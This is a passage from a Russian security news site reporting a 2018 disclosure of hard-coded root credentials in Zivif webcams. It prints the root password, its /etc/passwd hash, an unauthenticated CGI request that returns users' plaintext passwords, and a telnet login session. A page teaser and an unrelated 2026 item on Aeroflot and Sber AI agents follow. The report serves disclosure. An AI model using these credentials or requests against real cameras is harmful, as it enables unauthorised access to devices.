В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Олег Иванов 09 Января 2018 - 10:44

...

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Веб-камеры Zivif PR115-204-P-RS V2.3.4.2103 содержат жестко закодированный пароль cat1029, использующийся для пользователя root. Настройка операционной системы SONIX делает этот пароль неизменяемым, соответственно, его можно использовать для доступа к устройству через сеанс TELNET.

Как утверждают специалисты, камерам Zivif недостает контроля доступа, в результате функции CGI можно вызывать напрямую, обходя проверки подлинности.

Проблема получила идентификатор CVE-2017-17106, заключается она в том, что камера на запрос http://<Адрес Камеры>/web/cgi-bin/hi3510/param.cgi?cmd=getuser отвечает следующим образом:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Учетные данные возвращаются в текстовом виде.

Также эксперты отметили в файле /etc/passwd наличие жестко закодированной записи (CVE-2017-17107):

root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

Зашифрованный пароль - cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Из-за того, как структурирована файловая система, изменение этого пароля составит нетривиальную задачу.

Следующая главная новость »

Публичное облако 2026: где заканчивается удобство и начинаются риски?
Регистрируйтесь на эфир!

Екатерина Быстрова 04 Июня 2026 - 18:59

GenAI (генеративный искусственный интеллект) Домашние пользователи Корпорации

Аэрофлот и Сбер хотят подключить ИИ-агентов к покупке поездок

Аэрофлот и Сбер договорились вместе разрабатывать решения для транспортной отрасли на основе генеративного искусственного интеллекта. Соглашение подписали на ПМЭФ-2026 гендиректор Аэрофлота Сергей Александровский и глава Сбербанка Герман Греф.

Партнёрство рассчитано на три года. За это время компании планируют обмениваться опытом, тестировать цифровые продукты и внедрять сервисы для автоматизации бизнес-процессов. Отдельный акцент сделают на технологиях ИИ.

Самая интересная часть соглашения — идея связать интеллектуальных ИИ-агентов Аэрофлота и Сбера в единую экосистему. По задумке, такие агенты смогут взаимодействовать друг с другом напрямую, без человека-оператора, и решать комплексные задачи в реальном времени.

На практике это может привести к появлению более цельного клиентского сценария. Например, пользователь выбирает рейс, оплачивает билет, оформляет страховку и покупает дополнительные тревел-услуги без прыжков между приложениями и без бесконечного повторного ввода одних и тех же данных.

Звучит как попытка наконец-то убрать из покупки поездки цифровую возню, к которой все давно привыкли. Потому что сейчас даже простой маршрут может превратиться в мини-квест: билет здесь, страховка там, ещё один сервис в отдельном окне, данные вводим заново, терпение теряем по дороге.

Пока речь идёт о развитии технологии и совместной работе, а не о готовом сервисе, который появится завтра утром. Но направление понятно: крупные игроки хотят встроить ИИ не только в чат-боты и поддержку, а в саму логику покупки и сопровождения поездки.

Если проект дойдёт до работающего продукта, ИИ-агенты смогут взять на себя часть рутины, а пользователю останется меньше кнопок, меньше форм и меньше раздражения. В тревеле это уже звучит почти как роскошь.

Публичное облако 2026: где заканчивается удобство и начинаются риски?
Регистрируйтесь на эфир!